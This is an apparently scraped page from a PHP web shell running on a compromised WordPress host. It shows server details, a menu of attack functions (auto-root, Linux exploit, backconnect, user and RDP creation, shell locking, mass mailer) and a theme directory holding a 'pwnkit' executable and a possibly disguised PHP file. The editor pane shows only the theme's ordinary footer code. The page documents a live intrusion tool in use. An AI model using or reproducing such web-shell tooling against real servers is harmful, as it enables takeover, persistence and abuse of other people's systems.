Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
themes /
arise /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
genericons
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
page-templates
[ DIR ]
drwxr-xr-x
tgm
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
1.58
KB
-rw-r--r--
adminer.php
0
B
-rw-r--r--
changelog.txt
5.76
KB
-rw-r--r--
comments.php
1.16
KB
-rw-r--r--
content-index.php
174.94
KB
-rw-r--r--
content.php
3.59
KB
-rw-r--r--
footer.php
3.28
KB
-rw-r--r--
functions.php
10.68
KB
-rw-r--r--
functionsbak.php
10.19
KB
-rw-r--r--
header.php
5.03
KB
-rw-r--r--
index.php
1.31
KB
-rw-r--r--
logo.jpg
174.94
KB
-rw-r--r--
navigation.php
677
B
-rw-r--r--
page.php
2.29
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
4.58
KB
-rw-r--r--
screenshot.png
988.36
KB
-rw-r--r--
search.php
1.3
KB
-rw-r--r--
searchform.php
865
B
-rw-r--r--
sidebar.php
1.24
KB
-rw-r--r--
single.php
5.03
KB
-rw-r--r--
style.css
85.71
KB
-rw-r--r--
woocommerce.php
1.53
KB
-rw-r--r--
wpml-config.xml
714
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : footer.php
<?php /** * The template for displaying the footer. * * @package Theme Freesia * @subpackage Arise * @since Arise 1.0 */ $arise_settings = arise_get_theme_options(); if (!is_page_template('page-templates/arise-corporate.php') ){ if(is_page_template('three-column-blog-template.php') || is_page_template('our-team-template.php') || is_page_template('about-us-template.php') || is_page_template('important-works-template.php') ){ }else{?> </div> <!-- end .container --> <?php } } ?> </div> <!-- end #content --> <!-- Footer Start ============================================= --> <footer id="colophon" class="site-footer clearfix"> <?php $footer_column = $arise_settings['arise_footer_column_section']; if( is_active_sidebar( 'arise_footer_1' ) || is_active_sidebar( 'arise_footer_2' ) || is_active_sidebar( 'arise_footer_3' ) || is_active_sidebar( 'arise_footer_4' )) { ?> <div class="widget-wrap"> <div class="container"> <div class="widget-area clearfix"> <?php if($footer_column == '1' || $footer_column == '2' || $footer_column == '3' || $footer_column == '4'){ echo '<div class="column-'.$footer_column.'">'; if ( is_active_sidebar( 'arise_footer_1' ) ) : dynamic_sidebar( 'arise_footer_1' ); endif; echo '</div><!-- end .column'.$footer_column. ' -->'; } if($footer_column == '2' || $footer_column == '3' || $footer_column == '4'){ echo '<div class="column-'.$footer_column.'">'; if ( is_active_sidebar( 'arise_footer_2' ) ) : dynamic_sidebar( 'arise_footer_2' ); endif; echo '</div><!--end .column'.$footer_column.' -->'; } if($footer_column == '3' || $footer_column == '4'){ echo '<div class="column-'.$footer_column.'">'; if ( is_active_sidebar( 'arise_footer_3' ) ) : dynamic_sidebar( 'arise_footer_3' ); endif; echo '</div><!--end .column'.$footer_column.' -->'; } if($footer_column == '4'){ echo '<div class="column-'.$footer_column.'">'; if ( is_active_sidebar( 'arise_footer_4' ) ) : dynamic_sidebar( 'arise_footer_4' ); endif; echo '</div><!--end .column'.$footer_column. '-->'; } ?> </div> <!-- end .widget-area --> <?php if(has_nav_menu('footermenu')): $args = array( 'theme_location' => 'footermenu', 'container' => '', 'items_wrap' => '<ul>%3$s</ul>', ); echo '<nav id="footer-navigation" role="navigation">'; wp_nav_menu($args); echo '</nav><!-- end #footer-navigation -->'; endif; ?> </div> <!-- end .container --> </div> <!-- end .widget-wrap --> <?php } ?> <div class="site-info"> <div class="container"> <?php if(has_nav_menu('social-link') && $arise_settings['arise_buttom_social_icons'] == 0): do_action('social_links'); endif; do_action('arise_sitegenerator_footer'); ?> <div style="clear:both;"></div> </div> <!-- end .container --> </div> <!-- end .site-info --> <?php $disable_scroll = $arise_settings['arise_scroll']; if($disable_scroll == 0):?> <div class="go-to-top"><a title="<?php _e('Go to Top','arise');?>" href="#masthead"></a></div> <!-- end .go-to-top --> <?php endif; ?> </footer> <!-- end #colophon --> </div> <!-- end #page --> <?php wp_footer(); ?> </body> </html>
Close